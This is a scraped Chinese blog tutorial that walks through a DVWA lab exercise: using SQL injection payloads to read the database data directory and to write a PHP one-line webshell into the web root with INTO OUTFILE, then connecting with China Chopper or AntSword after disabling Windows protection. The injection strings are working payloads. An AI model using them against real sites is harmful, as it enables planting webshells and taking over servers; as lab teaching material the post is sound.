SQL注入写入一句话php(outfile方式)&中国菜刀连接 您所在的位置:网站首页 用来形容言谈举止写一句话 SQL注入写入一句话php(outfile方式)&中国菜刀连接

SQL注入写入一句话php(outfile方式)&中国菜刀连接

2024-07-09 07:15| 来源: 网络整理| 查看: 265

通过SQL注入漏洞上传一句话 前言一、先读取路径二、用outfile写入1.关闭windows系统防护 三、上传成功之后可以用某刀或者蚁剑

前言

    具体原理不做讲解,直接开门见山 此次试验全部在dvwa靶场实现,这里以dvwa的low级别为例

一、先读取路径 1' union select @@datadir,2#

在这里插入图片描述

二、用outfile写入 1' union select 1,"" into outfile 'C:/phpStudy/PHPTutorial/WWW/yjh.php'--

在这里插入图片描述     出现这个,关闭windows系统防护

1.关闭windows系统防护

在这里插入图片描述     重新再打一次注入上传一句话,这个时候我们可以打开文件夹查看一下 在这里插入图片描述     出现了我们利用sql注入漏洞,写入的一句话php文件

三、上传成功之后可以用某刀或者蚁剑

在这里插入图片描述 完成!

结语: outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出。 dumpfile只能写一行,并且输出中不存在任何格式。

    本站所有文章均为原创,欢迎转载,请注明文章出处: https://blog.csdn.net/weixin_43847838/article/details/111087911.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有